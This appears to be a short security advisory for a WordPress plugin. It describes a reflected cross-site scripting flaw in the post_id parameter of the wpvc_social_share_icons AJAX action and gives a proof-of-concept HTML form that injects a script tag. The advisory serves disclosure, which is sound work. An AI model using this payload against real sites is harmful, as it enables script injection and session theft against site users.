The plugin does not sanitise and escape the post_id parameter before outputting it back in the response via the wpvc_social_share_icons AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpvc_social_share_icons" />
<input type="hidden" name="post_id" value='asd"/><script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>